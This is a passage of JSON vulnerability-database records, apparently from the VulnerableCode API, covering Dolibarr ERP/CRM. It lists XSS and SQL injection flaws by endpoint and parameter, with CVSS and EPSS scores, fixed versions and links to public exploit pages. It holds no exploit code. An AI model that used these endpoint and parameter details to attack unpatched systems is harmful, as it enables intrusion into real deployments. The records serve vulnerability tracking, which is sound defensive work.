bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4"}],"aliases":["CVE-2019-19212","GHSA-pm57-926c-28mr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yrys-ch5x-23bv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61208?format=json","vulnerability_id":"VCID-zve5-afaq-mkh8","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nDolibarr ERP/CRM through 8.0.3 has `/exports/export.php?datatoexport=` XSS.","references":[{"reference_url":"http://packetstormsecurity.com/files/150623/Dolibarr-ERP-CRM-8.0.3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/150623/Dolibarr-ERP-CRM-8.0.3-Cross-Site-Scripting.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-19799","reference_id":"","reference_type":"","scores":[{"value":"0.0218","scoring_system":"epss","scoring_elements":"0.84623","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-19799"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-19799","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-19799"},{"reference_url":"https://pentest.com.tr/exploits/Dolibarr-ERP-CRM-8-0-3-Cross-Site-Scripting.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://pentest.com.tr/exploits/Dolibarr-ERP-CRM-8-0-3-Cross-Site-Scripting.html"},{"reference_url":"https://www.exploit-db.com/exploits/45945","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.exploit-db.com/exploits/45945"},{"reference_url":"https://www.exploit-db.com/exploits/45945/","reference_id":"","reference_type":"","scores":[],"url":"https://www.exploit-db.com/exploits/45945/"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/45945.txt","reference_id":"CVE-2018-19799","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/45945.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/122316?format=json","purl":"pkg:composer/dolibarr/dolibarr@8.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.4"}],"aliases":["CVE-2018-19799","GHSA-ggww-q2gv-m3g4"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zve5-afaq-mkh8"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/60979?format=json","vulnerability_id":"VCID-g2vp-1tvr-w3d3","summary":"Dolibarr ERP and CRM contain XSS Vulnerability\nThe test_sql_and_script_inject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17971","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41909","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17971"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/b2feac9d90f2ecfd5916c4d49176ff1a138744c8","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/b2feac9d90f2ecfd5916c4d49176ff1a138744c8"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/8000","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/8000"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17971","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17971"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17971","GHSA-qjq9-wx5j-jrg6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g2vp-1tvr-w3d3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/58145?format=json","vulnerability_id":"VCID-n1er-wev8-vbbq","summary":"Dolibarr SQL injection vulnerability in comm/multiprix.php\nSQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17897","reference_id":"","reference_type":"","scores":[{"value":"0.00342","scoring_system":"epss","scoring_elements":"0.57091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17897"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17897","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17897"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17897","GHSA-9v7m-f3cv-68rw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n1er-wev8-vbbq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55230?format=json","vulnerability_id":"VCID-n85a-q385-b7dk","summary":"Dolibarr SQL injection vulnerability in adherents/subscription/info.php\nSQL injection vulnerability in adherents/subscription/info.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the rowid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17899","reference_id":"","reference_type":"","scores":[{"value":"0.00342","scoring_system":"epss","scoring_elements":"0.57091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17899"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17899","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17899"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17899","GHSA-7789-v767-37r5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n85a-q385-b7dk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/53682?format=json","vulnerability_id":"VCID-r611-nxvd-akf6","summary":"Dolibarr SQL injection vulnerability in fourn/index.php\nSQL injection vulnerability in fourn/index.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the socid parameter.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17900","reference_id":"","reference_type":"","scores":[{"value":"0.00342","scoring_system":"epss","scoring_elements":"0.57091","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-17900"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/4a5988accbb770b74105baacd5a034689272128c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17900","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-17900"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17900","GHSA-6frc-vfw9-wm27"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r611-nxvd-akf6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/58573?format=json","vulnerability_id":"VCID-uthw-1ze2-3qdc","summary":"Dolibarr sensitive information disclosure\nDolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive 